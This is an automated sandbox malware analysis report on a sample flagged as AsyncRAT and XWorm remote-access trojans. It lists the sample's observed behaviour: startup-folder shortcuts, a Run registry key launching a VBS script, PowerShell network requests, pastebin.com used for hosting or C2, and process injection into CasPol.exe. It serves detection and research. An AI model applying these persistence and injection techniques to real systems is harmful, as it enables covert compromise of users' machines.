Malware Analysis Report

2024-10-19 06:56

Sample ID 240628-pknb8ayhjg
Target .
SHA256 6e6856c0003a452f331ac9f2c7d73c28ca0d1924763b43544dfa1a65cc92b68d
Tags
asyncrat xworm default venom clients execution persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6e6856c0003a452f331ac9f2c7d73c28ca0d1924763b43544dfa1a65cc92b68d

Threat Level: Known bad

The file . was found to be: Known bad.

Malicious Activity Summary

asyncrat xworm default venom clients execution persistence rat trojan

Detect Xworm Payload

Suspicious use of NtCreateUserProcessOtherParentProcess

Xworm

AsyncRat

Async RAT payload

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Executes dropped EXE

Loads dropped DLL

Drops startup file

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Suspicious use of SetThreadContext

Drops file in System32 directory

Enumerates physical storage devices

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Opens file in notepad (likely ransom note)

NTFS ADS

Views/modifies file attributes

Delays execution with timeout.exe

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Modifies registry class

Suspicious use of SendNotifyMessage

Suspicious behavior: GetForegroundWindowSpam

Enumerates system info in registry

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-28 12:23

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-28 12:23

Reported

2024-06-28 12:36

Platform

win11-20240508-en

Max time kernel

780s

Max time network

786s

Command Line

C:\Windows\Explorer.EXE

Signatures

AsyncRat

rat asyncrat

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 416 created 3312 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\Explorer.EXE
PID 416 created 3312 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\Explorer.EXE
PID 3108 created 3312 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\Explorer.EXE
PID 3108 created 3312 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\Explorer.EXE
PID 4768 created 3312 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\Explorer.EXE
PID 4768 created 3312 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\Explorer.EXE
PID 1440 created 3312 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\Explorer.EXE
PID 1440 created 3312 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\Explorer.EXE
PID 2420 created 3312 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\Explorer.EXE
PID 2420 created 3312 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\Explorer.EXE
PID 3496 created 3312 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\Explorer.EXE
PID 3496 created 3312 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\Explorer.EXE
PID 1864 created 3312 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\Explorer.EXE
PID 1864 created 3312 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\Explorer.EXE

Xworm

trojan rat xworm

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk C:\Windows\System32\notepad.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk C:\Windows\System32\notepad.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk C:\Windows\System32\notepad.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk C:\Windows\System32\notepad.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Software\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\ProgramData\\embetesgar.vbs" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4152 set thread context of 6884 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Enumerates physical storage devices

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\1 = 8c00310000000000a858086d110050524f4752417e310000740009000400efbec5525961a858086d2e0000003f0000000000010000000000000000004a00000000002658e200500072006f006700720061006d002000460069006c0065007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100370038003100000018000000 C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" C:\Windows\system32\OpenWith.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = 020000000100000000000000ffffffff C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Version = "1" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4 C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Windows\system32\OpenWith.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e8005398e082303024b98265d99428e115f0000 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Windows\system32\OpenWith.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\1\MRUListEx = ffffffff C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Windows\system32\OpenWith.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\2\0 = 5a00310000000000dc58f962100053797374656d33320000420009000400efbec5522d60dc58f9622e0000008f36000000000100000000000000000000000000000037051301530079007300740065006d0033003200000018000000 C:\Windows\system32\OpenWith.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \Registry\User\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\NotificationData C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings C:\Windows\System32\notepad.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Generic" C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" C:\Windows\system32\OpenWith.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Downloads" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\2 C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" C:\Windows\system32\OpenWith.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
